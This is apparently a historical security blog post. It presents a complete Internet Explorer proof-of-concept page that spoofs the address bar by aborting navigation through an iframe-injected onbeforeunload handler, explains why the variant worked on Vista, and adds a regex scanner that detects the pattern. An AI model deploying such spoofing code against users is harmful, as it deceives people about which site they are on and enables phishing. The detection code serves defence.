The XP-only URL spoof using onbeforeunload and history.go(0) stopped working on Windows Vista. After some digging, I found a small adjustment that restored the behavior on Vista: instead of calling history.go(0) directly in the top window’s onbeforeunload, I injected the handler into an iframe using execScript, and from there called top.history.go(0). That one level of indirection was enough to make it work on both platforms.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>urlSpoofOnBeforeUnloadVista</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>urlSpoofOnBeforeUnloadVista</h2>
</center>
<div id="mainText">
	<b>Note:</b> This version is the same as [urlSpoofOnBeforeUnload] but with a little change so <b>now it works
	well also on Vista</b>.<br /><br />
	While trying to navigate to a different URL, we will abort the navigation but keep the typed URL in the addressBar.<br />
	This is similar to this one [http://lcamtuf.coredump.cx/ietrap/] but it works only on<b>before</b>unload and it's not
	using the document.open. Just a top.history.go(0) inside the IFRAME.<br /><br />
	In other words, we achieve the same thing [http://lcamtuf.coredump.cx/ietrap/] but using a different technique.<br /><br />
	<font color="blue">
		<b>Go ahead! Type any URL in the addressBar, and let's see what happens...</b><br /><br />
	</font>
</div>
<hr />
<center>
	<iframe name="myFrame" width="100" height="100"></iframe>
</center>
<script language="JavaScript">
if (!window.opener)
{
	window.opener = 1;
	// Here we execute the onbeforeunload, but inside the IFRAME.
	// This is what makes this version work on Vista.
	myFrame.execScript('window.onbeforeunload = function(){top.history.go(0);}');
}
else
{
	document.all.mainText.innerHTML = 'The URL on the addressBar has changed, however, we are still on the same page.';
}

</script>
</font>
</body>
</html>

On Vista, IE ran in Protected Mode with enhanced process isolation, which changed how the top-level onbeforeunload event interacted with the history object. By registering the onbeforeunload handler inside the iframe via execScript instead, and pointing it at top.history.go(0), the call took a slightly different code path that Vista did not block. The net effect is the same: the user’s typed URL stays in the address bar while the page never navigates, creating a convincing visual spoof.
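For reviewing archived or submitted pages, the following added example (not code from the original post) is a heuristic static check that flags the pattern described above: an onbeforeunload handler that calls history.go(0), whether assigned directly or injected into a frame through an execScript string. The function names and the three sample pages are constructed for illustration.

```javascript
// Heuristic only: regexes, no JS parsing; handler bodies with nested braces are missed.
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// frame.execScript('<code string>') -> [1] frame name, [3] injected code
const EXEC_RE = /(\w+)\s*\.\s*execScript\s*\(\s*(['"])((?:\\.|(?!\2).)*)\2/g;
// onbeforeunload = function(){ <body> } -> [1] body
const HANDLER_RE = /onbeforeunload\s*=\s*function\s*\([^)]*\)\s*\{([^}]*)\}/g;
// history.go(0), optionally reached through top. or parent. -> [1] window used
const RENAV_RE = /(?:\b(top|parent)\s*\.\s*)?\bhistory\s*\.\s*go\s*\(\s*0\s*\)/;

// Return one finding per onbeforeunload handler in `code` that reloads history.
function handlersIn(code, via) {
  const hits = [];
  for (const m of code.matchAll(HANDLER_RE)) {
    const renav = RENAV_RE.exec(m[1]);
    if (renav) hits.push({ via, target: renav[1] || 'self' });
  }
  return hits;
}

// Scan every inline <script> in an HTML string.
function scanHtml(html) {
  const findings = [];
  for (const s of html.matchAll(SCRIPT_RE)) {
    // Handlers hidden inside execScript strings are reported with the frame name.
    for (const e of s[1].matchAll(EXEC_RE)) {
      findings.push(...handlersIn(e[3], 'execScript:' + e[1]));
    }
    // Strip those strings so the same handler is not also counted as direct.
    findings.push(...handlersIn(s[1].replace(EXEC_RE, ''), 'direct'));
  }
  return findings;
}

// Constructed sample pages (not captured traffic).
const IFRAME_VARIANT = `<iframe name="myFrame"></iframe><script>
myFrame.execScript('window.onbeforeunload = function(){top.history.go(0);}');
</script>`;
const DIRECT_VARIANT = `<script>
window.onbeforeunload = function(){ history.go(0); };
</script>`;
const BENIGN_PAGE = `<script>
window.onbeforeunload = function(){ return 'Unsaved changes'; };
</script>`;

for (const [name, html] of Object.entries({ IFRAME_VARIANT, DIRECT_VARIANT, BENIGN_PAGE })) {
  console.log(name, JSON.stringify(scanHtml(html)));
}
```

A page that only prompts about unsaved changes in onbeforeunload produces no finding; only handlers that re-navigate history are reported.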

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.